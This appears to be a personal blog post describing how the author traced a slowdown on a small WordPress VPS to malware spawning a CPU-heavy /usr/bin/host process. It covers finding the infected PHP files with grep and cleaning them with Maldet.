Recently I have been having internet problems at home, so alarm bells didn’t immediately start to ring when a number of websites on a small VPS that I look after for a colleague started loading extremely slowly.
Eventually I noticed that other websites at this time were going pretty quick and it was just the ones on this particular VPS that were crawling along.
Firstly I restarted apache and then mysql however things didn’t improve. Eventually I rebooted the server completely and things sped up – for a while.
Unfortunately within an hour things slowed down again, and I noticed one process was consuming massive amounts of CPU, leaving very little for anything else.
The process was /usr/bin/host.
After doing a little research I began to realize that it was possible the VPS had been compromised so I killed the process, which sped things up once again, temporarily.
I knew that something must be restarting the CPU eating process and suspected a cron job, so I logged into my putty and checked out the cronjobs.
Unfortunately I couldn’t see anything that looked too suspicious so headed back to Google.
Eventually I came across this article and it helped me greatly, mainly the part where it shows you how to search through all your files, and highlight which ones included the text /usr/bin/host. So that is what I did.
grep -ri --include=*.php "/usr/bin/host" /
The files that showed up indeed appeared to be infected, looking at the code it appeared to be unpacking and installing malware.
I then installed and ran Maldet which found another 16 or so infected files and then cleaned or quarantined what it found.
The problem for now has gone away, I advised my colleague to update all their WordPress plugins, themes etc and changed passwords.
It’s only a matter of time before another attack hits, however for now everything is back to normal.